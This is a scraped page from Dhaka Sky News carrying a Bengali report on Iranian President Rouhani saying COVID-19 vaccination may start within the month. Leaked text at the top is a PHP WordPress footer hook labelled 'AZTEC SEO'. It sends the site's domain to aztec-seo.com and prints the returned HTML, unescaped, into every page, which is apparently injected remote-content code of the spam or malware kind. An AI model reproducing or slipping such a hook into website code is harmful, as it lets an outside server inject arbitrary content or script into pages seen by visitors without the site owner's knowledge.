/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ইরানে চলতি মাসেই টিকা দেয়া শুরু হতে পারে: প্রেসিডেন্ট রুহানি | Dhaka Sky News

ইরানের সঙ্গে বন্ধুত্বপূর্ণ সম্পর্ক স্থাপনে প্রস্তুত: সৌদি পররাষ্ট্রমন্ত্রীর ঘোষণা

আগের সংবাদ

নিষেধাজ্ঞা ব্যর্থ হয়েছে, উজ্জ্বল অর্থনীতি পাবে ইরান: প্রেসিডেন্ট রুহানি

পরের সংবাদ

ইরানে চলতি মাসেই টিকা দেয়া শুরু হতে পারে: প্রেসিডেন্ট রুহানি

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: January 23, 2021 , 11:38 pm

ইসলামি প্রজাতন্ত্র ইরানের প্রেসিডেন্ট ড. হাসান রুহানি বলেছেন, চলতি ফার্সি বছরের মধ্যেই তার দেশে প্রাণঘাতী করোনাভাইরাস প্রতিরোধক টিকা কার্যক্রম শুরু হতে পারে। প্রেসিডেন্ট জানান, এ বিষয়টি নিয়ে তার সরকার জোরালো প্রচেষ্টা চালাচ্ছে।

করোনাভাইরাসের বিরুদ্ধে লড়াইয়ে গঠিত জাতীয় টাস্কফোর্সের এক বৈঠকে আজ (শনিবার) প্রেসিডেন্ট রুহানি এসব কথা বলেছেন। তিনি বলেন, আজকের বৈঠকে চলতি ফার্সি মাসেই ইরানের টিকা কার্যক্রম শুরু করার ব্যাপারে সর্বাত্মক প্রচেষ্টা চালানোর কথা ঘোষণা দেয়া হয়েছে। আল্লাহ চান তো এটি শুরু হবে এবং এটি হবে খুবই গুরুত্বপূর্ণ একটি কাজ।

প্রেসিডেন্ট রুহানি আরো জানান, চলতি বছরের বাকি দিনগুলোতে ইরানে করোনাভাইরাস-প্রতিরোধক তিনটি টিকা বাজারে আসবে। আগামী ২১ মার্চ ফার্সি নতুন বছর শুরু হবে।

প্রেসিডেন্ট রুহানি বলেন, এসব টিকার কোনো কোনোটা সম্পূর্ণভাবে দেশে তৈরি, বাকিগুলো যৌথভাবে তৈরি। এর পাশাপাশি একটি বহুজাতিক কোম্পানি উৎপাদিত এক কোটি ৬০ লাখ কোভ্যাক্স টিকা গ্রহণ করবে ইরান। এছাড়া, আরো বিভিন্ন জায়গা থেকে টিকা কেনার চেষ্টা করছে ইরান। তিনি বলেন, “দেশে উদ্ভাবিত টিকা হচ্ছে আমাদের জন্য সম্মান আর বিদেশের টিকা হচ্ছে আমাদের প্রয়োজন। দেশের টিকা বাজারে পর্যাপ্ত পরিমাণে না আসা পর্যন্ত বিদেশ থেকে টিকা আমদানি করা হবে।” সূত্র : পার্সটুডে